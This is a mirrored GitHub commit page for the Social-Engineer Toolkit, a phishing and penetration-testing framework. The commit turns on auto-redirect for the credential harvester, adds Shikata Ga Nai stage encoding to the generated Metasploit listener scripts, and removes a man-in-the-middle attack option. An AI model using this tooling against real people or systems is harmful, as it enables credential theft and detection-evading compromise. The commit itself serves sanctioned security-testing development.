mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-11-27 15:00:27 +00:00
Added new features to second stage encoding from Metasploit
This commit is contained in:
parent
6366352644
commit
470295a861
5 changed files with 17 additions and 21 deletions
|
@ -180,7 +180,7 @@ UPX_PATH=/usr/bin/upx
|
|||
### This feature will turn on or off the automatic redirection. By default for example in multi-attack
|
||||
### the site will redirect once one successful attack is used. Some people may want to use Java applet
|
||||
### and credential harvester for example.
|
||||
AUTO_REDIRECT=OFF
|
||||
AUTO_REDIRECT=ON
|
||||
#
|
||||
### This will redirect the harvester victim to this website once executed and not to the original website.
|
||||
### For example if you clone abcompany.com and below it says blahblahcompany.com, it will redirect there instead.
|
||||
|
|
|
@ -1,3 +1,10 @@
|
|||
~~~~~~~~~~~~~~~~
|
||||
version 5.0.3
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
||||
* added set EnableStageEncoding true to default to encode the second stage with Shikata Ga Nai
|
||||
* fixed an issue that would cause webjacking to go back to the mlitm
|
||||
|
||||
~~~~~~~~~~~~~~~~
|
||||
version 5.0.2
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
|
|
@ -419,7 +419,7 @@ try:
|
|||
filewrite = file("%s/meta_config_multipyinjector" % (setdir), "a")
|
||||
port_check = check_ports("%s/meta_config_multipyinjector" % (setdir), shellcode_port)
|
||||
if port_check == False:
|
||||
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (choice9,shellcode_port))
|
||||
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (choice9,shellcode_port))
|
||||
filewrite.close()
|
||||
|
||||
if validate_ip(choice2) == False:
|
||||
|
@ -670,6 +670,7 @@ try:
|
|||
if flag == 0:
|
||||
filewrite.write("set LPORT "+choice3+"\n")
|
||||
|
||||
filewrite.write("set EnableStageEncoding true\n")
|
||||
filewrite.write("set ExitOnSession false\n")
|
||||
|
||||
if auto_migrate == "ON":
|
||||
|
|
|
@ -161,10 +161,8 @@ try:
|
|||
return_continue()
|
||||
break
|
||||
|
||||
# Web Attack menu choice 5: Man Left in the Middle Attack Method
|
||||
if attack_vector == "5":
|
||||
choice3 = '0'
|
||||
if attack_vector != "5":
|
||||
# Removed to delete MLITM
|
||||
if attack_vector != "99999":
|
||||
|
||||
###################################################
|
||||
# USER INPUT: SHOW WEB ATTACK VECTORS MENU #
|
||||
|
@ -383,17 +381,16 @@ try:
|
|||
# cred harvester for auto site here
|
||||
if attack_vector == "harvester" or attack_vector == "tabnabbing" or attack_vector == "webjacking":
|
||||
if attack_vector == "tabnabbing" or attack_vector == "webjacking":
|
||||
sys.path.append("src/webattack/tabnabbing")
|
||||
debug_msg(me, "importing 'src.webattack.tabnabbing.tabnabbing'", 1)
|
||||
try:reload(tabnabbing)
|
||||
except: import tabnabbing
|
||||
try:reload(src.webattack.tabnabbing)
|
||||
except: import src.webattack.tabnabbing
|
||||
# start web cred harvester here
|
||||
sys.path.append("src/webattack/harvester")
|
||||
debug_msg(me, "importing 'src.webattack.harvester.harvester'", 1)
|
||||
try:
|
||||
reload(harvester)
|
||||
reload(src.webattack.harvester)
|
||||
except:
|
||||
import harvester
|
||||
import src.webattack.harvester
|
||||
|
||||
# if we are using profiler lets prep everything to get ready
|
||||
if attack_vector == "profiler":
|
||||
|
@ -682,15 +679,6 @@ try:
|
|||
import src.webattack.multi_attack.multiattack
|
||||
|
||||
|
||||
# option for thebiz man left in the middle attack vector
|
||||
if choice3 == '0':
|
||||
sys.path.append("src/webattack/mlitm")
|
||||
debug_msg(me, "importing 'src.webattack.mlitm.thebiz'", 1)
|
||||
try:
|
||||
reload(thebiz)
|
||||
except:
|
||||
import thebiz
|
||||
|
||||
# Return to main menu
|
||||
if choice3 == '4':
|
||||
print (" Returning to main menu.\n")
|
||||
|
|
|
@ -229,7 +229,7 @@ def print_error(message):
|
|||
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
|
||||
|
||||
def get_version():
|
||||
define_version = '5.0.2'
|
||||
define_version = '5.0.3'
|
||||
return define_version
|
||||
|
||||
class create_menu:
|
||||
|
|
Loading…
Reference in a new issue